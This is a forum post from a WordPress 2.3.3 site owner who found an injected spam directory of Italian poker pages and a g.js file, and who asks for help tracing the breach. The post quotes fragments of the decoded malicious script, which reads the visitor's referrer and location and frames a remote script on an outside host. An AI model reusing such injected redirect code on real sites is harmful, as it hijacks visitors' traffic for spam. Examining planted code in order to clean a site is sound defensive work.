-: Exploits - Bugs - Vulnerabilities :-
Wordpress 2.3.3 Exploit/Vulnerability - Adds Spam Directory
Tonight, while checking my site backup's sync log, I noticed a folder named "1" in the output, residing at the top level of the wp-content folder. Within the "1" folder, there are 71 separate files -- 70 poker-site-spammy HTML pages, each in Italian, and one g.js file. There was also a folder named backup-6bb0d, which contained a zero-byte index.php, at the top level of the wp-content folder. The wp-content's index.php file (which just says 'silence is golden') had also been edited or replaced -- but the only change is a blank line on row one. My site itself wasn't hacked -- all files and folders are just fine. No new stories or comments or users were created, etc. It seems the extent of the hack was creating the "1" folder.
I checked my sftp, ftp, and access logs, and there's nothing suspicious there at all -- which makes me suspect this is some sort of injection attack. I searched the logs around the time the files were created, but with my limited technical skills, noting seemed out of whack (there are no references to "poker.html" in any of the log files, for instance). The g.js file contains one "var str" definition that's ASCII encoded; I decoded it and got this output (line breaks added for readability):
var referer = escape(document.referrer);"
"var fromd = escape(document.location);"
frames"+"pacing=0 border=0 rows=\"1"+"00%, *
\"noresize><fr"+"ame name=\"online\" src=\""+
That means nothing at all to me. Here's the full .js file, with the "var str" bit removed, given it's shown above:
var str="118#97#114#32#etc as decoded above...;
function r(keyw, cat, lang)
document.write("var fid='http://www.preserve"+"sight"+"colorado.org/feb.php?2'; var q1='"+keyw+"';
var lang='"+lang+"'; var subacc='"+cat+"';");
In the HTML files themselves, there are only four links. The first three are external links, but they simply go to the Italian versions of Google, MSN, and Yahoo (nothing passed with the URLs at all, just the root). The fourth is an href link back to the document itself, like this:
<a href="giochi-poker-gratis-da-scaricare.html">giochi poker gratis da scaricare</a>
My site runs WordPress 2.3.3, but I do use a number of third-party plug-ins -- and that's where my suspicions lie for the most likely culprit. However, I don't have any idea how to go about figuring out how someone got in ... nor if there are better places than this to report an apparent security issue. So if anyone can offer any advice, I'd welcome it!